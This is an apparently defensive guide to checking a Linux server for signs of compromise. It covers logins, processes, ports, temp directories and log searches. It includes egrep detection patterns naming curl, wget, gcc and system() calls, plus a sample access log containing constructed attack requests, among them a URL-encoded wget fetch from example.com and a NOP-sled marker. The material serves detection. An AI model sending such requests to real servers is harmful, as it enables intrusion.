Check if the server is hacked or not
Introduction
Server security is critical for maintaining the integrity, confidentiality, and availability of your data and services. If you suspect unusual activity on your Linux server, it is important to investigate immediately to determine whether the system has been compromised. By checking user activity, running processes, network connections, and suspicious files, administrators can identify possible signs of intrusion or malicious activity.
Prerequisites
Before starting the investigation, ensure the following:
Root or sudo access to the Linux server
Basic knowledge of Linux commands and server administration
Access to server log files
Backup of important data before making any modifications
Avoid deleting or modifying suspicious files during the initial investigation phase
How to Check if the Server is Hacked or Not
1. Check Who Is Currently Logged Into the Server
Use the following commands to identify active users and SSH connections:
w
netstat -nalp | grep ":22"
OR
w && netstat -nalp | grep ":22"
These commands display currently logged-in users and active SSH sessions.
2. Check Who Logged Into the Server Previously
last
cat /var/log/secure* | grep ssh | grep Accept
cat /var/log/secure* | grep ftp | grep Accept
These logs help identify successful SSH and FTP login attempts.
3. Check Current Network Activity
netstat -nalp
nmap localhost
OR
netstat -nalp && nmap localhost
These commands help identify listening ports, suspicious services, and unusual network activity.
4. Check Running Processes
ps -elf
ls /proc/*/exe -la
Review running processes carefully for unknown or suspicious programs.
5. Check Common Attack Locations
ls /tmp -la
ls /var/tmp -la
ls /dev/shm -la
These directories are commonly used by attackers to store malicious scripts or binaries.
Important:
Do not delete or modify files immediately. First catalog and document suspicious files for further investigation.
6. Check Linux Version Information
For Red Hat-based systems:
cat /etc/redhat-release
For non-Red Hat systems:
cat /etc/issue
Compare the output with:
uname -a
and
cat /proc/version
This helps verify whether the kernel version matches the installed operating system version.
7. Check File Ownership and Access Information
Check the author or owner of files:
ls -la --author
Check file access times:
ls -l --time=access
This helps identify recently accessed or modified files.
8. Identify File Type
Before opening suspicious files, verify whether they are text or binary files:
file filename
OR
file /path/to/directory/*
9. Update the Locate Database
updatedb &
This updates the locate database for faster file searches.
10. Search for Apache Exploits
Search Apache access logs for common exploit patterns:
locate access_log | while IFS= read -r i; do echo "$i"; egrep -i '(chr\(|system\()|(curl|wget|chmod|gcc|perl)%20' "$i"; done
OR
egrep -i '(chr\(|system\()|(curl|wget|chmod|gcc|perl)%20' /path/to/log/files/*
cPanel Servers
egrep -i '(chr\(|system\()|(curl|wget|chmod|gcc|perl)%20' /usr/local/apache/logs/*
egrep -i '(chr\(|system\()|(curl|wget|chmod|gcc|perl)%20' /home/*/statistics/logs/*
Ensim Servers
egrep -i '(chr\(|system\()|(curl|wget|chmod|gcc|perl)%20' /home/virtual/site*/fst/var/log/httpd/*
Plesk Servers
egrep -i '(chr\(|system\()|(curl|wget|chmod|gcc|perl)%20' /home/httpd/vhosts/*/statistics/logs/*
egrep -i '(chr\(|system\()|(curl|wget|chmod|gcc|perl)%20' /var/log/httpd/*
11. Search for Shell Code Patterns
grep -F '\x90' /path/to/access/logs/*
This command searches the access logs for the literal text \x90. Apache writes non-printable request bytes into its logs as \xNN escapes, so a run of 0x90 (NOP) bytes typical of shellcode shows up as repeated \x90 in the log, not as raw binary.
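As an added example (not part of the original article), the following script runs the step 10 exploit-pattern search and the step 11 shellcode search over a constructed sample access log, so both checks can be exercised before pointing them at real log files; the log lines, the 203.0.113.x addresses and the temporary-file handling are assumptions made for illustration.

```shell
#!/bin/sh
# Added example, not from the original article: exercise the article's two
# access-log searches against a constructed sample log.

# Write a constructed (made-up) sample access log to a temp file; print its path.
make_sample_log() {
    f=$(mktemp)
    cat > "$f" <<'EOF'
203.0.113.10 - - [10/Oct/2023:13:55:36 +0000] "GET /index.php HTTP/1.1" 200 2326
203.0.113.11 - - [10/Oct/2023:13:56:01 +0000] "GET /page.php?cmd=system() HTTP/1.1" 500 0
203.0.113.12 - - [10/Oct/2023:13:57:12 +0000] "GET /dl.php?c=wget%20http://example.com/x HTTP/1.1" 404 0
203.0.113.13 - - [10/Oct/2023:13:58:44 +0000] "GET /\x90\x90\x90\x90 HTTP/1.1" 400 0
203.0.113.14 - - [10/Oct/2023:13:59:10 +0000] "GET /images/logo.png HTTP/1.1" 200 5120
EOF
    printf '%s\n' "$f"
}

# Step 10 check: count log lines matching the article's exploit pattern
# (function-call fragments or URL-encoded download/compile commands).
count_exploit_hits() {
    grep -Eic '(chr\(|system\()|(curl|wget|chmod|gcc|perl)%20' "$1"
}

# Step 11 check: Apache logs non-printable bytes as \xNN escapes, so a NOP
# sled appears as the literal text \x90. Count lines containing it.
count_shellcode_hits() {
    grep -Fc '\x90' "$1"
}

# When run directly: build the sample log and report both counts.
LOG=$(make_sample_log)
echo "exploit-pattern hits:  $(count_exploit_hits "$LOG")"
echo "shellcode marker hits: $(count_shellcode_hits "$LOG")"
rm -f "$LOG"
```

On the sample above the exploit pattern matches the system() and wget%20 lines and the shellcode search matches only the \x90 line; the same functions work unchanged on a real access_log path.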
Conclusion
By following the above investigation steps, administrators can identify suspicious activity and determine whether a Linux server has been compromised. Regular monitoring of login activity, processes, network connections, and log files plays a major role in early threat detection and server protection. If signs of compromise are found, it is recommended to isolate the server, perform a detailed forensic analysis, and strengthen security measures immediately.
